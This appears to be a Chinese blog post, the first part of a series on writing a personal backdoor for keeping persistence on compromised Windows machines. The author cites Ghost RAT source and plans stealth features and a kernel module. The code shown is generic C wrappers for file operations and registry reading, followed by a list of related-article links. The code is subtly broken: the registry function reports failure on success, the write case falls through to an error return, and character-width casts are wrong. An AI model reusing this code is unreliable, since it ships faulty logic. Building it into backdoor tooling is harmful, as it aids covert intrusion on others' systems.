個人的後門程式開發(第一部分):檔案操作和登錄檔管理
本來是想寒假時寫的,結果一直懶得動手。
雖然手上有ghost原始碼,但是感覺功能不是我想要的,比如把精力費在學MFC寫介面上不如改進下隱藏性。
基本的計劃就是做一個後門程式,目的是用來進行許可權維持的。目前來看是基於控制檯的,而且要帶有核心模組,應用層的主要問題就是沒寫過太大體量的程式導致搞起來很蛋疼,核心方面就是通用性坑爹,
藍色畫面起來也要費時間。
第一部分就是封裝的兩個函式,檔案操作和登錄檔管理。ghost是把這兩個功能封裝成兩個類,我這裡就直接用函式來實現了。
VS2015編譯透過
1 //檔案操作類函式 2 #include "windows.h" 3 4 //Mode操作模式 5 //0.新建檔案 1.刪除檔案 2.寫檔案 3.讀檔案 4.移動檔案 5.獲取檔案資訊 6 #define CREATE_FILE 0 7 #define DELETE_FILE 1 8 #define WRITE_FILE 2 9 #define READ_FILE 3 10 #define MOVE_FILE 4 11 #define QUERY_FILE 5 12 13 #define FILE_SUCCESS 1 14 #define FILE_ERROR 0 15 16 //定義一個檔案資訊的結構,用於QUERY_FILE返回 17 typedef struct _FileInfo{ 18 DWORD FileAttributes; 19 char *FileName; 20 char *TypeName; 21 22 } FILE_INFO,*PFILE_INFO; 23 24 DWORD FileControl(IN DWORD Mode,IN LPWSTR FilePath, IN OUT PVOID Buffer,IN __int64 FilePointer,IN OUT DWORD *Size) 25 { 26 HANDLE FileHandle = 0; 27 DWORD Return = 0; 28 SHFILEINFO MyFileInfo = { 0 }; 29 PFILE_INFO FileInfo = 0; 30 __int64 TempPointer = FilePointer; 31 TempPointer = TempPointer & 0XFFFFFFFF; 32 __int64 *pTempPointer = &TempPointer; 33 switch (Mode) 34 { 35 case WRITE_FILE: 36 case READ_FILE: 37 case QUERY_FILE: 38 FileHandle=CreateFile(FilePath, 39 GENERIC_READ | GENERIC_WRITE | GENERIC_ALL, 40 FILE_SHARE_DELETE | FILE_SHARE_READ | FILE_SHARE_WRITE, 41 NULL, 42 OPEN_EXISTING, 43 FILE_ATTRIBUTE_NORMAL, 44 NULL 45 ); 46 if (FileHandle== INVALID_HANDLE_VALUE) 47 { 48 Return = GetLastError(); 49 return Return; 50 } 51 break; 52 case CREATE_FILE: 53 FileHandle = CreateFile(FilePath, 54 GENERIC_READ | GENERIC_WRITE | GENERIC_ALL, 55 FILE_SHARE_DELETE | FILE_SHARE_READ | FILE_SHARE_WRITE, 56 NULL, 57 CREATE_NEW, 58 FILE_ATTRIBUTE_NORMAL, 59 NULL 60 ); 61 if (FileHandle == INVALID_HANDLE_VALUE) 62 { 63 Return = GetLastError(); 64 return Return; 65 } 66 break; 67 default: 68 break; 69 } 70 switch (Mode) 71 { 72 case CREATE_FILE: 73 CloseHandle(FileHandle); 74 break; 75 case DELETE_FILE: 76 if (!DeleteFile(FilePath)) 77 { 78 Return = GetLastError(); 79 return Return; 80 } 81 break; 82 case MOVE_FILE: 83 if (!MoveFile(FilePath,(LPCWSTR)Buffer)) 84 { 85 return FILE_ERROR; 86 } 87 break; 88 case QUERY_FILE: 89 SHGetFileInfo(FilePath, 90 NULL, 91 &MyFileInfo, 92 sizeof(MyFileInfo), 93 SHGFI_TYPENAME | SHGFI_DISPLAYNAME | SHGFI_ATTRIBUTES); 94 /////////////////////////////////////////////////// 95 /* 96 typedef struct _SHFILEINFO 97 98 { 99 100 HICON hIcon;//檔案的圖示控制程式碼 101 102 int iIcon;//圖示的系統索引號 103 104 DWORD dwAttributes;//檔案的屬性值 105 106 char szDisplayName[MAX_PATH];//檔案的顯示名 107 108 char szTypeName[80];//檔案的型別名 109 110 } SHFILEINFO; 111 */ 112 ///////////////////////////////////////////// 113 FileInfo=(PFILE_INFO)HeapAlloc(GetProcessHeap(), 114 HEAP_ZERO_MEMORY, 115 sizeof(FILE_INFO)); 116 if (!FileInfo) 117 { 118 return FILE_ERROR; 119 } 120 memset(FileInfo, 0, sizeof(FILE_INFO)); 121 FileInfo->FileAttributes = MyFileInfo.dwAttributes; 122 FileInfo->FileName = (char *)HeapAlloc(GetProcessHeap(), 123 HEAP_ZERO_MEMORY, 124 sizeof(MyFileInfo.szDisplayName)); 125 memcpy(FileInfo->FileName, 126 MyFileInfo.szDisplayName, 127 sizeof(MyFileInfo.szDisplayName)); 128 FileInfo->TypeName = (char *)HeapAlloc(GetProcessHeap(), 129 HEAP_ZERO_MEMORY, 130 sizeof(MyFileInfo.szTypeName)); 131 memcpy(FileInfo->TypeName, 132 MyFileInfo.szTypeName, 133 sizeof(MyFileInfo.szTypeName)); 134 ((DWORD *)Buffer)[0] = (DWORD)FileInfo; 135 CloseHandle(FileHandle); 136 break; 137 case READ_FILE: 138 if ((!FilePointer)||(!Size)) 139 { 140 return FILE_ERROR; 141 } 142 if (SetFilePointer(FileHandle, 143 (LONG)(FilePointer >> 32), 144 (LONG *)pTempPointer, 145 FILE_BEGIN 146 ) == HFILE_ERROR) 147 { 148 return GetLastError(); 149 } 150 memset(Buffer, 151 0, 152 *Size); 153 if (!ReadFile(FileHandle, 154 (LPVOID)Buffer, 155 *Size, 156 Size, 157 NULL)) 158 { 159 return GetLastError(); 160 } 161 CloseHandle(FileHandle); 162 break; 163 case WRITE_FILE: 164 if ((!FilePointer) || (!Size)) 165 { 166 return FILE_ERROR; 167 } 168 if (SetFilePointer(FileHandle, 169 (LONG)(FilePointer >> 32), 170 (LONG *)pTempPointer, 171 FILE_BEGIN 172 ) == HFILE_ERROR) 173 { 174 return GetLastError(); 175 } 176 if (!WriteFile(FileHandle, 177 (LPCVOID)Buffer, 178 *Size, 179 Size, 180 NULL)) 181 { 182 return GetLastError(); 183 } 184 default: 185 return FILE_ERROR; 186 } 187 return FILE_SUCCESS; 188 } 189 DWORD IfFile(DWORD Return) 190 { 191 switch (Return) 192 { 193 case FILE_SUCCESS: 194 return 1; 195 case FILE_ERROR: 196 return 0; 197 default: 198 return -1; 199 } 200 }
1 //登錄檔操作的封裝函式 2 #include "windows.h" 3 4 #define DUQV 0 5 #define MEIJVZIJIAN 1 6 #define MEIJVJIANXIANG 2 7 #define PANDUANCUNZAI 3 8 //讀取登錄檔的指定鍵的資料(Mode:0-讀鍵值資料 1-牧舉子鍵 2-牧舉指定鍵項 3-判斷該鍵是否存在) 9 int ReadReg(HKEY MainKey, LPCTSTR SubKey, LPCTSTR Vname, DWORD Type, char *szData, LPBYTE szBytes, DWORD lbSize, int Mode) 10 { 11 HKEY hKey; 12 int iResult = 0; 13 char KeyName[32], ValueSz[MAX_PATH], ValueTemp[MAX_PATH]; 14 DWORD szSize, KnSize, dwIndex = 0; 15 memset(KeyName, 0, sizeof(KeyName)); 16 memset(ValueSz, 0, sizeof(ValueSz)); 17 memset(ValueTemp, 0, sizeof(ValueTemp)); 18 if (RegOpenKeyEx(MainKey,SubKey,0,KEY_READ,&hKey)!=ERROR_SUCCESS) 19 { 20 return -1; 21 } 22 switch (Mode) 23 { 24 case DUQV: 25 switch (Type) 26 { 27 case REG_SZ: 28 case REG_EXPAND_SZ: 29 szSize = sizeof(ValueSz); 30 if (RegQueryValueEx(hKey,Vname,NULL,&Type,(LPBYTE)ValueSz,&szSize)==ERROR_SUCCESS) 31 { 32 return -1; 33 } 34 break; 35 case REG_MULTI_SZ: 36 szSize = sizeof(ValueSz); 37 if (RegQueryValueEx(hKey,Vname,NULL,&Type,(LPBYTE)ValueSz,&szSize)==ERROR_SUCCESS) 38 { 39 return -1; 40 } 41 break; 42 case REG_BINARY: 43 szSize = lbSize; 44 if (RegQueryValueEx(hKey,Vname,NULL,&Type,szBytes,&szSize)==ERROR_SUCCESS) 45 { 46 return -1; 47 } 48 break; 49 } 50 break; 51 case MEIJVZIJIAN: 52 while (1) 53 { 54 memset(ValueSz, 0, sizeof(ValueSz)); 55 szSize = sizeof(ValueSz); 56 if (RegEnumKeyExA(hKey,dwIndex++,ValueSz,&szSize,NULL,NULL,NULL,NULL)!=ERROR_SUCCESS) 57 { 58 break; 59 } 60 wsprintf((LPWSTR)ValueTemp, L"[%s]\r\n", ValueSz); 61 strcat(szData, ValueTemp); 62 iResult = -1; 63 } 64 break; 65 case MEIJVJIANXIANG: 66 while (1) 67 { 68 memset(KeyName, 0, sizeof(KeyName)); 69 memset(ValueSz, 0, sizeof(ValueSz)); 70 memset(ValueTemp, 0, sizeof(ValueTemp)); 71 KnSize = sizeof(KeyName); 72 szSize = sizeof(ValueSz); 73 if (RegEnumValue(hKey,dwIndex++,(LPWSTR)KeyName,&KnSize,NULL,&Type,(LPBYTE)ValueSz,&szSize)!=ERROR_SUCCESS) 74 { 75 break; 76 } 77 switch (Type) 78 { 79 case REG_SZ: 80 wsprintf((LPWSTR)ValueTemp, L"%-24s %-15s %s \r\n", KeyName, "REG_SZ", ValueSz); 81 break; 82 case REG_EXPAND_SZ: 83 wsprintf((LPWSTR)ValueTemp, L"%-24s %-15s %s \r\n", KeyName, "REG_EXPAND_SZ", ValueSz); 84 break; 85 case REG_DWORD: 86 wsprintf((LPWSTR)ValueTemp, L"%-24s %-15s 0x%x(%d) \r\n", KeyName, "REG_DWORD", ValueSz, int(ValueSz)); 87 break; 88 case REG_MULTI_SZ: 89 wsprintf((LPWSTR)ValueTemp, L"%-24s %-15s \r\n", KeyName, "REG_MULTI_SZ"); 90 break; 91 case REG_BINARY: 92 wsprintf((LPWSTR)ValueTemp, L"%-24s %-15s \r\n", KeyName, "REG_BINARY"); 93 break; 94 default: 95 break; 96 } 97 lstrcat((LPWSTR)szData, (LPWSTR)ValueTemp); 98 iResult = 1; 99 } 100 break; 101 case PANDUANCUNZAI: 102 iResult = 1; 103 break; 104 default: 105 break; 106 } 107 RegCloseKey(MainKey); 108 RegCloseKey(hKey); 109 return iResult; 110 }
相關文章
- 登錄檔檔案修改開啟程式的簡單示例
- 隱藏任意程式,目錄檔案,登錄檔,埠
- 利用登錄檔隱藏檔案
- 檔案管理 檔案目錄概念
- 登錄檔
- .net 4.8 webApi 檔案下載部分程式碼記錄WebAPI
- 個人的後門程式開發(第二部分):網路連線處理
- 微信開發之錄音檔案
- 軟體登錄檔殘留怎樣清理_win10刪除登錄檔殘留檔案的方法Win10
- 程式執行資訊的非登錄檔儲存類(ini 檔案操作類) (轉)
- win10登錄檔怎麼開啟 開啟登錄檔編輯器的方法一覽Win10
- 用VC6編寫登錄檔管理程式(三) (轉)
- 用VC6編寫登錄檔管理程式(二) (轉)
- Linux檔案系統-目錄和檔案管理Linux
- Linux — 檔案、目錄管理Linux
- WordPress開發入門02:WordPress中不同目錄型別的PHP檔案型別PHP
- 【Linux入門教程】1 簡介、檔案管理、目錄Linux
- JAVA類檔案操作和異常Java
- 駭客經常更改的系統配置檔案及登錄檔(轉)
- 設定 Windows Media Player 推薦設定的登錄檔檔案Windows
- JSP檔案管理後門工具jsp-file-browserJS
- JQuery登錄檔單jQuery
- VC操作登錄檔
- win10系統中登錄檔如何開啟 win10系統開啟登錄檔的步驟Win10
- Linux檔案及目錄管理Linux
- Linux 檔案與目錄管理Linux
- Linux檔案和目錄管理Linux
- 微信小程式入門從這裡出發(登入註冊、開發工具、檔案及結構介紹)微信小程式
- Win95下的登錄檔檔案(User.dat,System.dat)檔案格式說明 (轉)
- 儲存、檔案管理/目錄、裝置管理
- IOS-Swift開發基礎——檔案管理iOSSwift
- win10如何清除登錄檔_win10清理登錄檔垃圾的方法Win10
- 檔案管理程式:ForkLift for MacMac
- 音訊開發之錄製播放pcm檔案音訊
- Linux指令入門-檔案管理Linux
- win10用快捷鍵登錄檔怎麼開啟_win10開啟登錄檔快捷鍵方法Win10
- SCSS partial部分檔案CSS
- 透過 .reg登錄檔 檔案來修改滑鼠的一些設定